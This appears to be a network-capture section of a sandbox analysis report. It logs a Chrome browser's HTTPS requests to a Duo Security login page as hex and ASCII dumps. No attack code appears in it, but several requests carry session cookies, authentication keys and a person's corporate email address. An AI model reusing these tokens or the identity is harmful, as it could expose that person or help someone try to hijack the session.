                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:27 UTC482OUTGET /customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR HTTP/1.1
                                                                                                                                          Host: ux-asset-commercial.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:27 UTC346INHTTP/1.1 403 Forbidden
                                                                                                                                          Server: CloudFront
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:27 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 919
                                                                                                                                          Connection: close
                                                                                                                                          X-Cache: Error from cloudfront
                                                                                                                                          Via: 1.1 0baa339c02d06988c65d8623d1b3c6ec.cloudfront.net (CloudFront)
                                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                          X-Amz-Cf-Id: -kS0Ebgj6_i2kQkzEBsIV1wGptySosmGlTNSpVcKyMKfPxAJlcQhjA==
                                                                                                                                          2024-11-18 05:48:27 UTC919INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BO


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          72192.168.2.165521352.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:28 UTC748OUTGET /static/images/favicon_duo.ico?v=e3716 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:28 UTC615INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:28 GMT
                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                          Content-Length: 6518
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-1976"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:28 UTC6518INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 28 05 00 00 26 00 00 00 20 20 00 00 01 00 20 00 28 14 00 00 4e 05 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 30 43 b2 64 9c 43 b2 64 e0 43 b2 64 fe 43 b2 64 f8 43 b2 64 de 43 b2 64 9c 43 b2 64 35 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 08 43 b2 64 9e 43 b2 64 fe 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 9d 43 b2 64 08 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 09 43 b2 64 c5 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43
                                                                                                                                          Data Ascii: (& (N( CdCdCdCdCd0CdCdCdCdCdCdCd5CdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdC


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          73192.168.2.165521535.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:29 UTC1210OUTPOST /email_first HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 208
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Accept: text/plain, */*; q=0.01
                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Origin: https://cisco.login.duosecurity.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:29 UTC208OUTData Raw: 61 75 74 68 6b 65 79 3d 41 53 31 38 52 43 37 39 30 53 30 56 45 4a 45 56 46 51 37 53 26 73 63 69 64 3d 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 26 72 65 71 2d 74 72 61 63 65 2d 67 72 6f 75 70 3d 30 66 36 34 62 62 30 36 61 64 61 32 39 39 61 36 37 39 36 32 38 64 65 35 26 75 73 65 72 6e 61 6d 65 3d 70 65 74 65 72 2e 73 6d 69 74 68 25 34 30 63 69 73 63 6f 2e 63 6f 6d 26 73 73 6f 2d 75 73 65 72 6e 61 6d 65 2d 69 6e 2d 64 75 6f 2d 64 65 73 6b 74 6f 70 3d 26 5f 78 73 72 66 3d 63 30 65 35 35 61 35 38 36 61 63 35 34 36 31 35 62 33 38 36 36 65 31 62 36 32 64 36 65 37 33 36
                                                                                                                                          Data Ascii: authkey=AS18RC790S0VEJEVFQ7S&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5&username=peter.smith%40cisco.com&sso-username-in-duo-desktop=&_xsrf=c0e55a586ac54615b3866e1b62d6e736
                                                                                                                                          2024-11-18 05:48:29 UTC508INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:29 GMT
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Content-Length: 273
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          2024-11-18 05:48:29 UTC273INData Raw: 7b 22 61 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 61 75 74 68 6b 65 79 22 3a 20 22 41 53 32 35 49 52 49 45 33 37 4d 35 4f 56 30 39 41 45 50 48 22 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 6e 75 6c 6c 2c 20 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 20 22 2f 6c 6f 67 69 6e 2f 3f 61 75 74 68 6b 65 79 3d 41 53 32 35 49 52 49 45 33 37 4d 35 4f 56 30 39 41 45 50 48 26 73 63 69 64 3d 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 73 63 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 64 75 6f 5f 64 65 73 6b 74 6f 70 5f 64 61 74 61 22 3a 20 6e
                                                                                                                                          Data Ascii: {"aid": "4873fe428ab243529767cba103466e46", "authkey": "AS25IRIE37M5OV09AEPH", "message": null, "redirect_url": "/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46", "scid": "4873fe428ab243529767cba103466e46", "duo_desktop_data": n


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          74192.168.2.166071452.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:30 UTC722OUTGET /email_first HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:30 UTC170INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 1043
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          ETag: "672e588f-413"
                                                                                                                                          2024-11-18 05:48:30 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->...[if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->...[if gt IE 9]>...> <html lang="en"> ...<![endif]--> <head> <meta charset="utf-8"> <titl


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          75192.168.2.166071535.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:30 UTC1321OUTGET /login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:30 UTC637INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:30 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 1797
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          X-S3-Assets: ux-asset-commercial.duosecurity.com
                                                                                                                                          Etag: "976cf054ec0b2246bb71dddb0ac291f3690d9338"
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ux-asset-commercial.duosecurity.com; connect-src 'self'
                                                                                                                                          2024-11-18 05:48:30 UTC1797INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Login</title><meta charset="utf-8" /><meta name="viewport" content="width=device-widt


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          76192.168.2.166071635.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:30 UTC1064OUTGET /static/css/page/login.css?v=8850e HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:30 UTC613INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:30 GMT
                                                                                                                                          Content-Type: text/css
                                                                                                                                          Content-Length: 67311
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-106ef"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:30 UTC15771INData Raw: 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 2c 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 3a 62 65 66 6f 72 65 2c 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 3b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 62 61 73 65 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38
                                                                                                                                          Data Ascii: html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.8
                                                                                                                                          2024-11-18 05:48:30 UTC16378INData Raw: 68 65 63 6b 65 64 3a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 2e 32 35 72 65 6d 3b 6c 65 66 74 3a 30 2e 32 35 72 65 6d 3b 6c 65 66 74 3a 76 61 72 28 2d 2d 73 69 7a 65 2d 62 61 73 65 2d 34 29 3b 77 69 64 74 68 3a 2e 33 37 35 72 65 6d 3b 68 65 69 67 68 74 3a 2e 36 32 35 72 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 2e 31 32 35 72 65 6d 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 2e 31 32 35 72 65 6d 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d
                                                                                                                                          Data Ascii: hecked::after{box-sizing:border-box;position:absolute;top:0;left:0.25rem;left:0.25rem;left:var(--size-base-4);width:.375rem;height:.625rem;content:"";transform:rotate(45deg);border-bottom:0.125rem solid #ffffff;border-bottom:0.125rem solid #ffffff;border-
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 64 35 34 31 33 62 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 77 61 72 6e 69 6e 67 7b 63 6f 6c 6f 72 3a 23 64 36 36 38 36 36 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 73 75 63 63 65 73 73 7b 63 6f 6c 6f 72 3a 23 36 33 63 35 37 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 36 34 36 34 36 34 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 68 65 61 64 65 72 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 68 65 61 64 65 72 2d 6c 69 67 68 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 62 6f 64 79 2d 64 61 72 6b 7b 63 6f 6c
                                                                                                                                          Data Ascii: t-error{color:#d5413b}.color-font-warning{color:#d66866}.color-font-success{color:#63c57f}.color-font-disabled{color:#646464}.color-font-inverse{color:#fff}.color-font-header-dark{color:#363f44}.color-font-header-light{color:#fff}.color-font-body-dark{col
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 68 65 61 64 6c 69 6e 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 73 75 62 74 69 74 6c 65 2d 72 65 67 75 6c 61 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 73 75 62 74 69 74 6c 65 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 62 6f 64 79 2d 72 65 67 75 6c 61 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 62 6f 64 79 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e
                                                                                                                                          Data Ascii: weight:900}.weight-font-headline{font-weight:900}.weight-font-title{font-weight:900}.weight-font-subtitle-regular{font-weight:400}.weight-font-subtitle-bold{font-weight:900}.weight-font-body-regular{font-weight:400}.weight-font-body-bold{font-weight:900}.
